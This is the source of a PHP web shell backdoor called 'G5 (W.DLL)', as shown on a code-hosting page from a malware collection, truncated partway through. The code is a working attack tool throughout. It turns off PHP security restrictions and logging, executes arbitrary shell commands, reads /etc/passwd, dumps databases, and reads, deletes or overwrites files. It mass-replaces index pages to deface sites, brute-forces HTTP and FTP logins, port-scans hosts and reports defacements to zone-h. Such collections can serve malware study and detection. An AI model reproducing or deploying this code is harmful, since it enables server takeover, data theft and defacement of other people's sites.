PageRenderTime 56ms CodeModel.GetById 15ms RepoModel.GetById 0ms app.codeStats 0ms

/Backdoors/PHP/G5.php

http://web-malware-collection.googlecode.com/
PHP | 1226 lines | 971 code | 49 blank | 206 comment | 125 complexity | 02741d0805cf6f79b2f40dcaaef78b28 MD5 | raw file

Large files files are truncated, but you can click here to view the full file

  1. <?php
  2. /**
  3. .-"""-.
  4. / .===. \
  5. \/ 6 6 \/
  6. ( \___/ )
  7. ______________ooo__\_____/__________________
  8. / \
  9. | Hi All |
  10. | $3ll: G5 (W.DLL) version 1.6 |
  11. | author: Piaster (wadelamin) |
  12. | Offical: http://piaster.blogspot.com |
  13. | E-mail: w.dll@live.com |
  14. | copyright: 2010-2011 Piaster. |
  15. | Page: www.facebook.com/Pias.Piaster |
  16. \___________________________ooo______________/
  17. | | |
  18. |_ | _|
  19. | | |
  20. |__|__|
  21. /-'P'-\
  22. (__/ \__)
  23. //--------------------------------------------/*/
  24. $access = 0; //if you don't wont anybody to access this file set $access=1
  25. $USR = "g5"; //User
  26. $PWD = "g5"; //PWD
  27. $color = 'black'; //#993333 #333333 style color
  28. $style = 'x4';// default x4 to change to orange style set var x5
  29. //---------------------------------------------------------------
  30. if($access==1){
  31. if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$USR || $_SERVER['PHP_AUTH_PW']!==$PWD){ob_end_clean();header('WWW-Authenticate: Basic realm="Piaster"');header('HTTP/1.0 401 Unauthorized');exit("<b><a href=http://www.w-dll.com>Piaster</a> : Access Denied</b>");}}
  32. session_start();
  33. @set_time_limit(0);
  34. @ini_restore("safe_mode");
  35. @ini_restore("allow_url_fopen");
  36. @ini_restore("open_basedir");
  37. @ini_restore("disable_functions");
  38. @ini_restore("safe_mode_exec_dir");
  39. @ini_restore("safe_mode_include_dir");
  40. @ini_set('error_log',NULL);
  41. @ini_set('log_errors',0);
  42. @ini_set('max_execution_time',0);
  43. @ini_set('output_buffering',0);
  44. $php = $_SERVER["PHP_SELF"];
  45. if(version_compare(phpversion(), '4.1.0') == -1)
  46. {$_POST = &$HTTP_POST_VARS;
  47. $_GET = &$HTTP_GET_VARS;}
  48. $tl=7;
  49. global $loc,$pass,$port,$user,$db;
  50. if($_GET['kil']=="me"){
  51. @unlink(getcwd().$_SERVER["SCRIPT_NAME"]);
  52. }
  53. $loc = 'localhost';
  54. define('db',htmlspecialchars($_POST['sqdbn']));
  55. define('pass',htmlspecialchars($_POST['sqpwd']));
  56. define('loc',htmlspecialchars($_POST['sqsrv'])? htmlspecialchars($_POST['sqsrv']):$log);
  57. define('port',htmlspecialchars($_POST['sqprt']));
  58. define('user',htmlspecialchars($_POST['sqlog']));
  59. define('style',$style);
  60. global $log;
  61. $log = @mysql_connect(loc,user,pass);
  62. $select = @mysql_select_db(db, $log);
  63. //$log = @mysqli_connect($loc,$user,$pass,$db,$port);
  64. if(isset($_REQUEST['dumd'])){
  65. $dt = date("Y-m-d");$db = $_POST['sqdbn'];$han = "WDLL-$db-$dt";$dmt = $_REQUEST['sqldp'];
  66. if ($dmt=='SQL'){$han="WDLL-$db-$dT.sql";$fp=fopen($han,"w");}else{$han="WDLL-$db-$dt.sql.gz";
  67. $fp = gzopen($han,"w");}
  68. $tb = @mysql_query ("SHOW TABLES");
  69. while ($X = @mysql_fetch_array($tb)) {
  70. $X = $X['Tables_in_'.$db];$mf = @mysql_fetch_array(@mysql_query ("SHOW CREATE TABLE ".$X));rt($mf['Create Table'].";\n\n");$sql = @mysql_query ("SELECT * FROM ".$X);
  71. if (@mysql_num_rows($sql)) {while ($row = @mysql_fetch_row($sql)) {foreach ($row as $v => $w) {
  72. $row[$v] = "'".@mysql_escape_string($w)."'";}rt("INSERT INTO $X VALUES(".implode(",", $row).");\n");}}}
  73. if ($dmt=='SQL'){fclose ($fp);}else{gzclose($fp);}
  74. header("Content-Disposition: attachment; filename=" . $han);
  75. header("Content-Type: application/download");
  76. header("Content-Length: " . @filesize($han));@flush();
  77. $fp = @fopen($han, "r");while (!feof($fp)){echo @fread($fp, 65536);@flush();} @fclose($fp); }
  78. if (isset($_REQUEST['dWNf'])||isset($_REQUEST["download"]) && $_REQUEST["download"] != @basename($_SERVER["SCRIPT_FILENAME"]))
  79. {if(isset($_REQUEST['dWNf'])){$file = htmlspecialchars($_POST['dWn']);}else {$file =$_REQUEST["download"];}
  80. header('Content-Length:'.@filesize($file).'');
  81. header('Content-Type: application/octet-stream');
  82. header('Content-Disposition: attachment; filename="'.$file.'"');
  83. if(function_exists('readfile')){@readfile($file);}else @file_get_contents($$file);}
  84. if (!empty($_POST['goto'])) { @chdir($_POST['goto']); $path = @realpath($_POST['goto']);}
  85. if(isset($_GET['dir'])&& !@is_file($_GET['dir'])){$path =@chdir(base64_decode(htmlspecialchars($_GET['dir'])));}
  86. if($dir){@chdir($_POST['dir']);}
  87. else {$path = @realpath(".");}
  88. $path = @realpath(".");
  89. if(!$win){
  90. define(path,$path);}else
  91. {$mxpath = str_replace('\\','/',$path);
  92. define(path,$mxpath.'/');}
  93. function curc(){
  94. $crk = @get_loaded_extensions();
  95. if(@in_array("curl", $crk)){return true;}else {return false;}}
  96. if(isset($_REQUEST["sqconf"]) or isset($_REQUEST["msq1"])){head('black');}
  97. else {head($color);} // ^_^
  98. if (isset($_REQUEST["action"]) && $_REQUEST["action"] != @basename($_SERVER["SCRIPT_FILENAME"])){
  99. $fa = stripcslashes(htmlspecialchars($_REQUEST["action"]));
  100. $fa = urldecode(base64_decode(str_replace("\\\\","\\",$fa)));
  101. ;echo "<center><br><br> <p align=\"center\"><a href=\"javascript: close()\">Close</a></p><table border =\"1\" bgcolor =\"black\"><tr><td><font color =\"red\"><b> File Path: </font> " .$fa. "</td><tr><tr><td><font color =\"red\"><b>File Size: </b></font>" . wdll_s1z(@filesize($fa)) ."</td></tr> <tr><td><font color =\"red\"><b>Create:</b></font> ".@date('d/m/Y H:i:s',@filectime($fa))."</td></tr><tr><td><font color =\"red\"><b>Modify: </b></font>" .@date('d/m/Y H:i:s', @filemtime($fa)) ."</td></tr><tr><td><font color =\"red\"><b>Mode: </b></font>" .wdll_permc($fa) . "</td></tr></table></center><br><center><table><tr>";echo "<form method=\"post\" action=\"" . $php . "?download=".$fa ."\"> ";sub('down','Download',$pr='');echo "</form>";echo "<form method=\"post\" action=\"" . $php . "?cod=" .@base64_encode($fa)."\">";sub('Source','Source',$pr='');echo "</form>";echo "<form method=\"post\" action=\"" . $php . "?chmod=" .$fa."\">";echo "</form>";echo "<form method=\"post\" action=\"" . $php . "?delete=" .@base64_encode($fa)."\">";sub('Delete','Delete',$pr='');echo "</form>";echo "</tr></table></center>";ft(); die;}
  102. if (isset($_REQUEST["delete"]) && $_REQUEST["delete"] != @basename($_SERVER["SCRIPT_FILENAME"]))
  103. {$rdel = base64_decode($_REQUEST["delete"]);
  104. $rdel = str_replace("\\", DIRECTORY_SEPARATOR, $rdel);if (@is_dir($rdel)){if (substr($rdel, -1) != DIRECTORY_SEPARATOR){$rdel .= DIRECTORY_SEPARATOR;}} elseif (is_file($rdel)){if(@unlink(htmlspecialchars($rdel))){echo "file " . $rdel . " Removed";}} else {echo "File Not Found";}echo "<p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a></p>"; ft(); die;}
  105. if (isset($_REQUEST["cod"]) && $_REQUEST["cod"] != @basename($_SERVER["SCRIPT_FILENAME"])){ if ($_REQUEST["cod"]){$tx = @base64_decode($_REQUEST["cod"]);if(function_exists('highlight_file')){@highlight_file($tx);}elseif(@function_exists('file_get_contents')){echo @file_get_contents($tx);}elseif(function_exists('file')){echo @file($tx);}else {rd();}}echo "<p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a></p>";ft(); die;}
  106. if (isset($_REQUEST["info"]) && $_REQUEST["info"] != @basename($_SERVER["SCRIPT_FILENAME"]))
  107. { echo("(wadelamin)<br> www.w.dll-sd.com<br>www.piaster.net<br> w.dll@live.com 2011 ");echo "<p align=\"center\"><a href=\"".$php."\">Home</a><br></p>";ft(); die;}
  108. if(isset($_REQUEST['allss'])){
  109. switch ($_REQUEST['fsOP'])
  110. {
  111. //toolz
  112. case 'cmdr': {$oP = 6;}break;
  113. case 'mil' : {$oP = 7;}break;
  114. case 'fts' : {$oP = 8;}break;
  115. case 'ftm' : {$oP = 9;}break;
  116. case 'frc' : {$oP = 10;}break;
  117. case 'fcf' : {$oP = 11;}break;
  118. case 'fsf' : {$oP = 12;}break;
  119. case 'fbk' : {$oP = 13;}break;
  120. case 'cry' : {$oP = 14;}break;
  121. case 'seaa': {$oP = 15;}break;
  122. }define(oP,$oP);}
  123. if(isset($_REQUEST['allqw'])){
  124. switch ($_REQUEST['dbOP']){
  125. case 'dmi': {$oPp = 1; }break;
  126. case 'ddu' : {$oPp = 2;}break;
  127. case 'ddr' : {$oPp = 3;}break;
  128. case 'dau' : {$oPp = 4;}break;
  129. case 'dml' : {$oPp = 5;}break;
  130. case 'dqu' : {$oPp = 6;}break;
  131. case 'etr' : {$oPp = 7;}break;
  132. }define(oPp,$oPp);}
  133. if(isset($_REQUEST['mSendm'])) {
  134. $headers = 'To: '.$_REQUEST['mito']."\r\n";
  135. $headers .= 'From: '.$_REQUEST['mnam'].' '.$_REQUEST['mmail']."\r\n";
  136. if (mail($_REQUEST['mito'],$_REQUEST['msubj'],$_REQUEST['mmsg'],$headers)) {
  137. echo "<center><b>Email sent!</b></center>";
  138. }
  139. else { echo "<center>Couldn't send email!</center>"; }
  140. echo "<br><br><br><a href=\"".$php."\">Home</a>|&nbsp;|<a href=\"javascript: history.go(-1)\">Back</a><br>"; ft();exit; }
  141. if(isset($_REQUEST["massa"]))
  142. {global $coded,$lop,$msi;
  143. $lop = 2;
  144. $coded = htmlspecialchars($_POST['coded']);
  145. $skid= htmlspecialchars($_POST['skid']);
  146. $msd = htmlspecialchars($_POST['masdr']);
  147. @chdir($msd);
  148. $msi = $_POST['msi'];
  149. if($msi == 'msfi'||$msi == 'msfa'||$msi == 'msfr'){
  150. $msdr = @opendir($msd) or die("<br><b>Permision denied! Unable to open dir $msd");
  151. wdll_nora($msdr, $msd,$coded,$skid);
  152. }
  153. else{db_mass($coded,$msi);exit;}}
  154. function fetchFilef($url,$path,$file)
  155. {$data=fetchFile($url);
  156. if ($data)
  157. {$d=@fopen($path.'/'.$file,"wb");
  158. $ret=@fwrite($d,$data);
  159. @fclose($d);
  160. return $ret;}return false;}
  161. function fetchFile($url){
  162. $urlpr=@parse_url($url);
  163. $in='';
  164. $host=$urlpr['host'];
  165. $port=isset($urlpr['port']) ? intval($urlpr['port']) : 80;
  166. if ($port==0) $port=80;
  167. $path=$urlpr['path'];
  168. if (isset($urlpr['query'])&&$urlpr['query']!='') $path.='?'.$urlpr['query'];
  169. $fs=@fsockopen($host,$port,$errno,$errstr,3);
  170. if ($fs)
  171. {$out="GET $path HTTP/1.1\r\nHost: $host\r\n";
  172. $out.="Connection: close\r\n\r\n";
  173. @fwrite($fs,$out);
  174. $end=false;
  175. while (!feof($fs))
  176. {$fl=@fgets($fs,1024);
  177. if ($end) $in.=$fl;
  178. if ($fl=="\r\n") $end=true;}
  179. @fclose($fs);
  180. }return $in;}
  181. function rt($dat) {global $fp;if ($_REQUEST['sqldp']=='SQL'){@fwrite($fp,$dat);}else{@gzwrite($fp, $dat);}}
  182. if(@function_exists('mysql_connect')){$dtb = "<font color=green>MySQL : On</font>";};if(@function_exists('mssql_connect')){$dtb = "<font color=green>MSSQL : On</font>";};if(@function_exists('pg_connect')){$dtb = "<font color=green>PostgreSQL : On</font>";};if(@function_exists('ocilogon')){$dtb = "<font color=green>Oracle : On</font>";};
  183. $win = strtolower(substr(PHP_OS,0,3)) == "win";
  184. $HO= "<a href=\"".$php."\">Home</a>";$kilm= "<a href=\"".$php."?kil=me\">Kill Me</a>";
  185. $sys = "OS: <font color=orange>".@wordwrap(@php_uname())."</font>";
  186. $us = "User: <font color=orange>".@get_current_user()."</font>";
  187. $SAD = "Admin Mail: <font color=orange>".$_SERVER['SERVER_ADMIN']."</font>";
  188. $soft = "Server: "."<font color=orange>".@getenv("SERVER_SOFTWARE")."</font>";
  189. if(@ini_get('disable_functions')){$FUC="Functions: <font color=red>Disable</font>";}else{$FUC="Functions:<font color=green> Enable</font>";}
  190. if(curc()){$cur="Curl: <font color=green>Enable</font>";}else{$cur="Curl: <font color=red>Disable</font>";}
  191. if (function_exists('ini_get'))
  192. if (@ini_get("safe_mode") || strtolower(@ini_get("safe_mode")) == "on")
  193. {$safe= TRUE;$mode = "<font color=red>ON</font>";}
  194. else {$safe = FALSE; $mode = "<font color=green>OFF</font>";}
  195. if (function_exists('ini_get'))
  196. {$ob = @ini_get("open_basedir");}else {$ob = @get_cfg_var("open_basedir");}
  197. if ($ob or strtolower($ob) == "on") {$openB = TRUE; $basedir = "<font color=red>".$ob."</font>";}
  198. else {$openB = FALSE; $basedir = "<font color=green>OFF</font>";}
  199. echo "<br><table bgcolor=\"800000\" width =80%><td>";
  200. echo "|| $HO || Safe Mode = ".$mode." &nbsp;|&nbsp;Open_Basedir = ". $basedir."&nbsp;|".$us."&nbsp;|".$soft."&nbsp;| ".$SAD."&nbsp;| ".$FUC."&nbsp;| ".$cur."<BR>";
  201. echo $sys;
  202. if(!$win)echo "&nbsp;| <b>Uid=".@getmyuid()." Gid=".@getmygid()."</b>&nbsp;|";
  203. if (is_callable("disk_free_space"))
  204. {$fre = @disk_free_space($path);$tot = @disk_total_space($path);if ($fre === FALSE) {$fre = 0;}if ($tot === FALSE) {$tot = 0;}if ($fre < 0) {$fre = 0;}if ($tot < 0) {$tot = 0;}$used = $tot-$fre;$frep = @round(100/($tot/$fre),2);
  205. echo "&nbsp;| HDD Free <font color =\"orange\">".wdll_s1z($fre)."</font> HDD Total&nbsp;<font color =\"orange\">".wdll_s1z($tot)."</font> (".$frep."%)</b> ";}
  206. echo"<font color=ffffff>&nbsp;|Dir mode:&nbsp;<b>".substr(decoct(@fileperms($path)), -3, 3)."</b></font>| DB:&nbsp; ".$dtb."&nbsp;| ".$kilm."";
  207. echo "</td></table><br>";
  208. if(isset($_REQUEST["find"]))
  209. {wdll_repx(); global $fin;
  210. $pathfd =htmlspecialchars($_POST['goto']);
  211. $fin = stripcslashes(htmlspecialchars($_POST['fin']));$fin = str_replace("\\\\","\\",$fin);
  212. $dih = @opendir($pathfd) or die("<br><b>Permision denied! Unable to open dir $path");
  213. echo wdll_nora($dih,$pathfd,$fin);}
  214. if(isset($_REQUEST["search"]))
  215. { global $words,$wordonly,$sesir,$serdir,$sea,$lop;
  216. $lop = 1;
  217. $serdir = htmlspecialchars($_POST['serdir']);
  218. $sesir = htmlspecialchars($_POST['sedir']);
  219. $words = trim(htmlspecialchars($_POST['searcc']));
  220. $wordonly = trim('/'.$words.'/');
  221. $sea = $_POST['sea'];
  222. $skid= htmlspecialchars($_POST['skid']);
  223. wdll_repx();
  224. $ser = @opendir($serdir) or die("<br><b>Permision denied! Unable to open dir $path");
  225. wdll_nora($ser, $serdir,$words,$skid);
  226. echo "<a href=\"".$php."\">Home</a>|&nbsp;|<a href=\"javascript: history.go(-1)\">Back</a><br>";exit;}
  227. if(oP == '10' || isset($_GET['dir'])|| isset($_GET['show'])||isset($_REQUEST["dir"]))
  228. {echo "<form action=\"".$php."\"method=\"post\">
  229. <a href=\"".$php."\">Home</a>|&nbsp;|<a href=\"javascript: history.go(-1)\">Back</a><br>";
  230. if($win)wdir();echo "<br><br>
  231. <b>Change Directory<br></b>";
  232. inp('text','25','goto',path);
  233. sub('dir','GO');
  234. echo "</form>";
  235. $files = array();
  236. $dir = array();
  237. wdll_repxl();
  238. if ($handle = @opendir(path))
  239. {while (false !== ($file = @readdir($handle)))
  240. {if(@is_dir($file)){$dir[] = $file;}else{$files[] = $file;}}
  241. asort($dir);asort($files);
  242. foreach($dir as $file){wdll_repxt($file);}
  243. foreach($files as $file){wdll_repxtr($file);}}
  244. else{echo "<u>Error!</u> Can't open <b>".@realpath('.')."</b>!<br>";}if(!isset($_GET['show']))exit();
  245. }
  246. function CFile($file,$serc)
  247. {
  248. if (!@is_readable($file))
  249. {@chmod($file, 0644);}
  250. $ioo = @file_get_contents($file);
  251. $x0 = true;
  252. if(@preg_match($serc, $ioo))
  253. {$x0 = false;}return $x0;}
  254. function md($mvdir,$dst,$cop=false) {
  255. if (substr($dst,-1) == "\\") $dst = substr($dst,0,strlen($dst)-1);
  256. if (substr($mvdir,-1) == "\\") $mvdir = substr($mvdir,0,strlen($mvdir)-1);
  257. if (!file_exists($mvdir)) return FALSE;
  258. dexists($dst);
  259. $han = @opendir($mvdir);
  260. while ($f = @readdir($han)) {
  261. $mvd = $mvdir . "\\" . $f;
  262. if (@is_dir($mvd)) {
  263. if (!($f['value']=="." || $f=="..")) {
  264. md($mvd,$dst . "\\" . $f,$cop);};} else {
  265. if(@copy( $mvd ,$dst . "\\" . $f))echo $mvd."&nbsp;Move&nbsp;Done \n";
  266. if (!$cop) {
  267. @unlink($mvd);};};};@closedir($han);if (!$cop) {@rmdir($mvdir);};return TRUE;};
  268. function dexists($dir) {
  269. if (substr($dir,-1) == "\\") $dir = substr($dir,0,strlen($dir)-1);
  270. if (@file_exists($dir)) return TRUE;
  271. $ex = explode("\\",$dir);
  272. while ($mc = each($ex)) {
  273. $mx = $mc['value'];};
  274. $mx = str_replace("\\" . $mx,"",$dir);
  275. if (!file_exists($mx)) {
  276. dexists($mx);};
  277. @mkdir($dir,0777);
  278. return TRUE;}
  279. $sqquery = htmlspecialchars($_POST['sqquery']);
  280. define(sql_query,$sqquery);
  281. if($_REQUEST['do']=="db" || isset($_REQUEST['sqlwxp'])){
  282. echo sqlexp();
  283. exit;}
  284. if(isset($_REQUEST["sqconf"])){wdll_dbc();exit;}
  285. wdll_bdx('800000');
  286. function wdll_nora($dih, $path,$fin='',$skid ='')
  287. { global $words,$wordonly,$sesir,$serdir,$sea,$msi,$lop,$fin;
  288. while (false !== ($file = @readdir($dih)))
  289. {$dir = $path . '/' . $file;
  290. if (@is_dir($dir) && $file != '.' && $file != '..' && $file != $skid)
  291. {
  292. $wok = @opendir($dir) or die("<br><b>Permision denied! undable to open dir $file");
  293. wdll_nora($wok, $dir,$fin,$skid);}
  294. elseif ($file != '.' && $file != '..' && $file != $skid)
  295. {
  296. if($_REQUEST["find"]){if($file == $fin){wdll_rep($dir, $path, $file);}}
  297. if($lop=='1'){
  298. switch ($_REQUEST["sea"])
  299. {
  300. case('cepr'):{if(!CFile($dir,$words)){wdll_rep($dir, $path, $file);}}break;
  301. case('cewo'):{if(!CFile($dir,$wordonly)){wdll_rep($dir, $path, $file);}}break;
  302. case('cefi'):{if (similar_text($file, $words) >= 3){wdll_rep($dir, $path, $file);}}break;
  303. case('cefn'):{if($file == $words){wdll_rep($dir, $path, $file);}}break;
  304. case('cefm'):{$perm = substr(decoct(@fileperms($dir)), -3, 3);if($perm == $words){wdll_rep($dir, $path, $file);} }break;
  305. case('ceft'):{$xtr = @pathinfo($file);$extt = $xtr["extension"]; if($extt == $words){wdll_rep($dir, $path, $file);}}break;
  306. default:{ echo "<a href=\"javascript: history.go(-1)\">Back....&nbsp;</a>";die('PLZ Select Search Mode');}}}
  307. if($lop =='2')
  308. {switch ($_REQUEST["msi"]){ case('msfi'):{if($file == 'index.php'or $file == 'home.php'or $file == 'index.aspx'or $file == 'index.html'or $file == 'index.htm'){ fiindex($dir);}}break;
  309. case('msfa'):{if(@is_file($dir)) {fiindex($dir);}}break;
  310. case('msfr'):{if($file != 'index.php'or $file != 'home.php'or $file != 'home.aspx'or $file != 'index.html'or $file != 'index.htm'){delf($dir);}}break;}}
  311. }}@closedir($dih);}
  312. //-------------------------------------------------------------------------------
  313. function extr_si(){
  314. $rvlink = $_REQUEST["sqtid"];
  315. {
  316. $rvsorc = "http://www.yougetsignal.com/tools/web-sites-on-web-server/php/get-web-sites-on-web-server-json-data.php?remoteAddress=";
  317. $rvall = $rvsorc.$rvlink;
  318. $rvcon = file_get_contents($rvall);
  319. preg_match_all('/"(.*?)"/si', $rvcon, $rvsits);
  320. foreach(array_unique($rvsits[1]) as $rvrs) {
  321. if(strstr($rvrs,'.')) {
  322. if(eregi('www',$rvrs)) {
  323. echo "http://".$rvrs."\n";
  324. }
  325. else {
  326. echo "http://www.".$rvrs."\n";}}}}
  327. }
  328. function cc($sit,$prt,$usr,$pwd,$tl){
  329. $ses = @curl_init();
  330. @curl_setopt($ses, CURLOPT_URL, "http://$sit:$prt");
  331. @curl_setopt($ses, CURLOPT_RETURNTRANSFER, 1);
  332. @curl_setopt($ses, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  333. @curl_setopt($ses, CURLOPT_USERPWD, "$usr:$pwd");
  334. @curl_setopt($ses, CURLOPT_CONNECTTIMEOUT, $tl);
  335. @curl_setopt($ses, CURLOPT_FAILONERROR, 1);
  336. $mix = @curl_exec($ses); return $mix;
  337. if ( @curl_errno($ses) == 28 ) {$er= "Connection Timeout Please Check&nbsp;[".$sit."]\n"; return $er; exit;}
  338. elseif ( @curl_errno($ses) == 0 )
  339. {$fc ="Cracking Success With Username&nbsp;[".$usr."]&nbsp;and Password&nbsp;[".$pwd."]&nbsp;Enjoy\n"; return $fc;}
  340. @curl_close($ses);}
  341. function fc($sit,$usr,$pwd,$tl){
  342. $ses = @curl_init();
  343. @curl_setopt($ses, CURLOPT_URL, "ftp://$sit");
  344. @curl_setopt($ses, CURLOPT_RETURNTRANSFER, 1);
  345. @curl_setopt($ses, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  346. @curl_setopt($ses, CURLOPT_FTPLISTONLY, 1);
  347. @curl_setopt($ses, CURLOPT_USERPWD, "$usr:$pwd");
  348. @curl_setopt ($ses, CURLOPT_CONNECTTIMEOUT, $tl);
  349. @curl_setopt($ses, CURLOPT_FAILONERROR, 1);
  350. $mix = @curl_exec($ses);
  351. if ( @curl_errno($ses) == 28 ) {$er ="[+]Error :Connection Timeout Please Check&nbsp;[".$sit."]\n"; return $er; exit;}
  352. elseif ( @curl_errno($ses) == 0 ){
  353. $fc = "[+]Cracking Success With Username&nbsp;[".$usr."]&nbsp;and Password&nbsp;[".$pwd."]&nbsp;Enjoy\n";}
  354. return $fc;
  355. @curl_close($ses);}
  356. function zhsr($hname,$htype,$hwhy,$domain)
  357. {$zh = 'http://zone-h.org/notify/single/';
  358. echo $zh."defacer=".$hname."&domain1=". $domain."&hackmode=".$htype."&reason=".$hwhy."\n";
  359. $ch = @curl_init();
  360. @curl_setopt($ch, CURLOPT_URL, $zh);
  361. @curl_setopt($ch,CURLOPT_POST,true);
  362. @curl_setopt($ch, CURLOPT_POSTFIELDS,"defacer=".$hname."&domain1=". $domain."&hackmode=".$htype."&reason=".$hwhy);
  363. @curl_setopt($ch,CURLOPT_FOLLOWLOCATION, true);
  364. @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  365. if ( @curl_errno($ch) == 28 ) {$er= "Connection Timeout Please Check&nbsp;[http://zone-h.org]\n"; echo $er."\n"; exit;}
  366. elseif ( @curl_errno($ch) == 0 ) {echo "[+]Zone-H Done\n";}
  367. $rs = @curl_exec($ch);@curl_close($ch);echo $rs;}
  368. function wdll_updir($dih, $path)
  369. {while (false !== ($file = @readdir($dih))){$dir = $path . '/' . $file;
  370. if ($file != '.' && $file != '..'){if(!@is_file($file)){echo $dir." &nbsp;=======>[DIR]\n";}else echo $dir."\n";}}@closedir($dih);}
  371. function wdll_p($mode)
  372. {switch(true){case(($mode & 0xC000) === 0xC000): {$t = "s";}break;case(($mode & 0x4000) === 0x4000): {$t = "d";}break;case(($mode & 0xA000) === 0xA000): {$t = "l";}break;case(($mode & 0x8000) === 0x8000): {$t = "-";}break;case(($mode & 0x6000) === 0x6000): {$t = "b";}break;case(($mode & 0x2000) === 0x2000): {$t = "c";}break;case(($mode & 0x1000) === 0x1000): {$t = "p";}break;case true :{$t = "?"; }break;}$o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0;$o["x"] = ($mode & 00100) > 0; $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;return array("t" => $t, "o" => $o, "g" => $g, "w" => $w);}
  373. function show_users()
  374. {$users = array();$rows=@file('/etc/passwd');if(!$rows) return 0;foreach ($rows as $string){$user = @explode(":",$string);if(substr($string,0,1)!='#') array_push($users,$user[0]);}echo $users."\n";}
  375. function wdll_permc($file)
  376. { if(@is_writable($file)) { return "writable";}
  377. if(!@is_writable($file) && @is_readable($file)) { return "red only";}
  378. if(!@is_writable($file) && @!is_readable($file)) { return "un writable";}
  379. }
  380. function wdll_perm($file)
  381. {
  382. $mode=@fileperms($file);
  383. $perms='';
  384. $perms .= ($mode & 00400) ? 'r' : '-';
  385. $perms .= ($mode & 00200) ? 'w' : '-';
  386. $perms .= ($mode & 00100) ? 'x' : '-';
  387. $perms .= ($mode & 00040) ? 'r' : '-';
  388. $perms .= ($mode & 00020) ? 'w' : '-';
  389. $perms .= ($mode & 00010) ? 'x' : '-';
  390. $perms .= ($mode & 00004) ? 'r' : '-';
  391. $perms .= ($mode & 00002) ? 'w' : '-';
  392. $perms .= ($mode & 00001) ? 'x' : '-';
  393. return $perms;
  394. }
  395. if(isset($_REQUEST["svff"]))
  396. {$wdf = stripslashes(stripcslashes($_POST['svdi']));
  397. $wdn = stripslashes(stripcslashes($_POST['cfed']));
  398. $wdc = @fopen($wdf, "wb");
  399. @fwrite($wdc, $wdn);
  400. @fclose($wdc);}
  401. function delf($dir)
  402. {$dir = str_replace("\\", DIRECTORY_SEPARATOR, $dir);
  403. if (@is_dir($dir)){if (substr($dir, -1) != DIRECTORY_SEPARATOR){$dir .= DIRECTORY_SEPARATOR;}}
  404. elseif (@is_file($dir)){if (@unlink($dir)){echo "File: ".$dir." ................Removed<br>";}}
  405. else{echo "Could not remove " . $dir . " OR File not Found";}}
  406. function wdll_cmdf($cmdq)
  407. {$res = '';if (!empty($cmdq)){if(function_exists('exec')){@exec($cmdq,$res);$res = @join("\n",$res);}elseif(function_exists('shell_exec')){$res = @shell_exec($cmdq);}elseif(function_exists('system')){@ob_start();@system($cmdq);$res = @ob_get_contents();@ob_end_clean();}elseif(function_exists('passthru')){@ob_start();@passthru($cmdq);$res = @ob_get_contents();@ob_end_clean();}elseif(@is_resource($f = @popen($cmdq,"r"))){$res = "";while(!@feof($f)) { $res .= @fread($f,1024); }@pclose($f);}}return $res;}
  408. function fiindex($wdf)
  409. {global $coded;
  410. $wdc = @fopen($wdf, "wb");
  411. $wdn = str_replace("\\"," ",$coded);
  412. @fwrite($wdc, $wdn);
  413. if(@fclose($wdc))echo $wdf.".........Done<br>";
  414. return true; }
  415. function wdll_chf()
  416. {@ini_restore("safe_mode");
  417. @ini_restore("open_basedir");if(function_exists('exec')) return true;
  418. elseif(function_exists('system')) return true;
  419. elseif(function_exists('shell_exec')) return true;
  420. elseif(function_exists('passthru')) return true;
  421. else return false;}
  422. function wdll_s1z($size, $digits = 2)
  423. { $kb = 1024; $mb = 1024 * $kb; $gb= 1024 * $mb; $tb = 1024 * $gb;
  424. switch (true){
  425. case ($size == 0): { return "N/A"; }break;
  426. case ($size < $kb): { return $size."B"; }break;
  427. case ($size < $mb): { return @round($size / $kb,$digits)."KB"; }break;
  428. case ($size < $gb): { return @round($size / $mb,$digits)."MB"; }break;
  429. case ($size < $tb): { return @round($size / $gb,$digits)."GB"; }break;
  430. case true: { return @round($size / $tb, $digits)."TB"; }break;
  431. }}
  432. function ps() {
  433. $hot = htmlspecialchars($_POST['hot']);
  434. $spt =intval(htmlspecialchars($_POST['spot']));
  435. $ept = intval(htmlspecialchars($_POST['epot']));
  436. echo "IP/Domain :&nbsp;".$hot;
  437. echo "\nChecking...From &nbsp;".$spt."&nbsp;To&nbsp;".$ept."&nbsp;Ports\n";
  438. for($x = $spt; $x <= $ept; $x++) {
  439. $OK = @fsockopen($hot, $x, $errno, $errstr, 3);
  440. if($OK) {
  441. echo "[-] Port [".$x."] is open\n";}}echo "Port Scan Complete";}
  442. function rf(){$temp=@tempnam('', "wd");$pos= stripslashes($_POST['cfil']);if(@copy("compress.zlib://".$pos, $temp)){$han = @fopen($temp, "r");$fct = @fread($han, @filesize($temp));@fclose($han);return $fct;@unlink($temp);} else {echo("File".$pos."dosen't exists or you don't haveaccess.");}}
  443. if (!$error)
  444. {if (function_exists('ini_get')){$umf=@ini_get("upload_max_filesize");}else {$umf =@get_cfg_var('upload_max_filesize');}
  445. if (preg_match("/([0-9]+)K/i",$umf,$tem)) $umf=$tem[1]*1024;
  446. if (preg_match("/([0-9]+)M/i",$umf,$tem)) $umf=$tem[1]*1024*1024;
  447. if (preg_match("/([0-9]+)G/i",$umf,$tem)) $umf=$tem[1]*1024*1024*1024;}
  448. $up_d = $path ;
  449. if (!$error && isset($_REQUEST["upcom"]))
  450. { if (@is_uploaded_file($_FILES["dfill"]["tmp_name"]) && ($_FILES["dfill"]["error"])==0)
  451. {
  452. $up_fn=str_replace(" ","_",$_FILES["dfill"]["name"]);
  453. $up_fn=preg_replace("/[^_A-Za-z0-9-\.]/i",'',$up_fn);
  454. $up_fp=str_replace("\\","/",$up_d."/".$up_fn);
  455. if (file_exists($up_fn))
  456. { echo ("<p class=\"error\">File $up_fn already exist! Delete and upload again!</p>\n");}
  457. else if (!@move_uploaded_file($_FILES["dfill"]["tmp_name"],$up_fp))
